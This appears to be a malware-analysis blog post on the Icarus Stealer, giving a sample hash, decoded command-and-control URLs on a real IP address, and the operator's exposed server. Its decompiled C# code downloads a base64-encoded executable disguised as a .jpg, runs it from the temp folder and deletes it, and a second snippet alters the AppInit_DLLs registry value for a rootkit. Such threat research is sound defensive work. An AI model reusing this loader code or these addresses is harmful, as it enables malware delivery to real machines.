# Icarus Stealer - What is it?
> What is this malware and how does it work

- toc: true 
- badges: true
- categories: [icarus,yara,config,dotnet]


![](https://i.ibb.co/RvwvG2z/icaruwsdr-athens.png)

## Overview

### Samples
`8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427` [Malware Bazaar](https://bazaar.abuse.ch/sample/8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427/)

### References
- Malware Sellix [link](https://icarusdevelopment.sellix.io/terms)
- Karsten twitter [ref](https://twitter.com/struppigel/status/1566685309093511170)
- They have a tutorial video! [video](https://vimeo.com/730741460?embedded=true&source=vimeo_logo&owner=176036178)

## Analysis

### C2 
The URLs are base64 encoded and link back to the c2 server. In this case the url links to a .jpg file which is infact a base64 endcoded PE.

```c#
private static void StopRootkit()
{
	WebClient webClient = new WebClient();
	Stream stream = webClient.OpenRead(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=")));
	StreamReader streamReader = new StreamReader(stream);
	string s = streamReader.ReadToEnd();
	byte[] bytes = Convert.FromBase64String(s);
	File.WriteAllBytes(Path.GetTempPath() + "\\rkd.exe", bytes);
	Process.Start(Path.GetTempPath() + "\\rkd.exe");
	File.Delete(Path.GetTempPath() + "\\rkd.exe");
}
```

#### C2 URLs
- `aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3JlbW92ZS5qcGc=` -> `http://193.31.116.239/crypt/public/Update_Downloads/remove.jpg`
- `aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3J0LmpwZw==` -> `http://193.31.116.239/crypt/public/Update_Downloads/rt.jpg`
There are more... 

### Downloaded Modules

#### remove.jpg 

Deletes the rootkit

```c#
public static void remove()
{
	try
	{
		bool[] array = new bool[2];
		array[0] = true;
		foreach (bool flag in array)
		{
			using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, flag ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", true))
			{
				bool flag2 = (registryKey.GetValue("AppInit_DLLs", "") as string).Contains("r77-");
				if (flag2)
				{
					registryKey.SetValue("AppInit_DLLs", "");
				}
			}
		}
	}
	catch (Exception ex)
	{
	}
}
```
#### rt.jpg
This is a simple startup function for an open source userland rootkit that can be found on GitHub [r77-rootkit](https://github.com/bytecode77/r77-rootkit).

## Server Misconfiguration
It's almost like the developer knows they made some mistakes...
![](https://i.imgur.com/eXIIX6b.jpg)

### Laravel Debugger Exposed
A typo in one of the C2 URLs exposed a server error with a full stack trace. This revealed that the developer was uing the [laravel](https://laravel.com/) PHP framework and had left the debugger publically exposed.
![](https://i.imgur.com/Mxz6nDx.png)

### Open Directory
The stack trace led to the discovery that the server root had been configured as an open directory with many files publicly served to the Internet including logs.
![](https://i.imgur.com/rU9UYGy.png)

**Analysis Stopped:** 

There are more files and download links that could be investigated but the malware is so simple and the server configured so poorly we stopped our analysis. This malware looks more like a hobby project than a professional business...